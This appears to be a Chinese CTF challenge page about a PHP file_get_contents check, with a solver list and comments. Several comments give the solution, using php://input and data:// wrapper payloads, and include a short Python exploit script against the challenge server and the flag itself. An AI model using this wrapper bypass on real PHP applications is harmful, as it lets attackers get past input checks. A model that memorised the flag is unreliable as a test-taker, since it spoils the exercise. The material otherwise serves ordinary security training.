file_get_contentsWEB 未解决
分数:
30
金币:
3
题目作者:
harry
一 血:
npfs
一血奖励:
2金币
解 决:
3571
提 示:
描 述:
file_get_contents????
评分(5)
解题动态

2046185809 攻破了该题 15小时前

whole 攻破了该题 1天前

1031368023 攻破了该题 2天前

AnAqiu 攻破了该题 2天前

featherwit001 攻破了该题 3天前

KKKBugKu 攻破了该题 4天前

Star0P 攻破了该题 4天前

HK1ng 攻破了该题 4天前

goodsnack 攻破了该题 5天前

MD 攻破了该题 5天前

无限老表 攻破了该题 5天前

sbsb767 攻破了该题 6天前

sun_space 攻破了该题 6天前

3092708385 攻破了该题 9天前

liujiahaoctf 攻破了该题 10天前

qiaoooo 攻破了该题 10天前

w1w2w3666 攻破了该题 10天前

shingu 攻破了该题 11天前

HamiLemon 攻破了该题 11天前

评论
HK1ng 4天前
举报
file_get_contents常用来读文件,但是也可以用伪协议来控制读的内容,这里就是使用data://text/plain,test。指定数据的 MIME 类型位text,然后内容是test,这个时候我们就控制了读取的内容,只需要传参ac位test即可拿到flag。
goodsnack 5天前
举报
post ac=1&fn=php://input raw里填1,对应ac的值
Zhumeng 4月前
举报
看到file_get_getcontents就要想到伪协议
Melancholy 4月前
举报
使用BP POST /?ac=1&fn=php://input HTTP/1.1 参数 1
飞天的母猪 5月前
举报
flag{688ebf9ece3756a3a5ac4e16616f1873}
xiazhi 6月前
举报
url/?ac=bugku&fn=flag.txt
bbggddaa 6月前
举报
https://blog.csdn.net/silence1_/article/details/90241302
LLTVLL 6月前
举报
?ac=123&fn=php://input,hackbar中post参数1
2324291123 10月前
举报
import requests url='http://114.67.175.224:15234/' url = url + '?ac=f&fn=php://input' data={'f'} re=requests.post(url, data) print(type(re)) print(re.text)
一路奔腾 1年前
举报
file_get_contents函数绕过,可以参考https://www.pianshen.com/article/24421724508/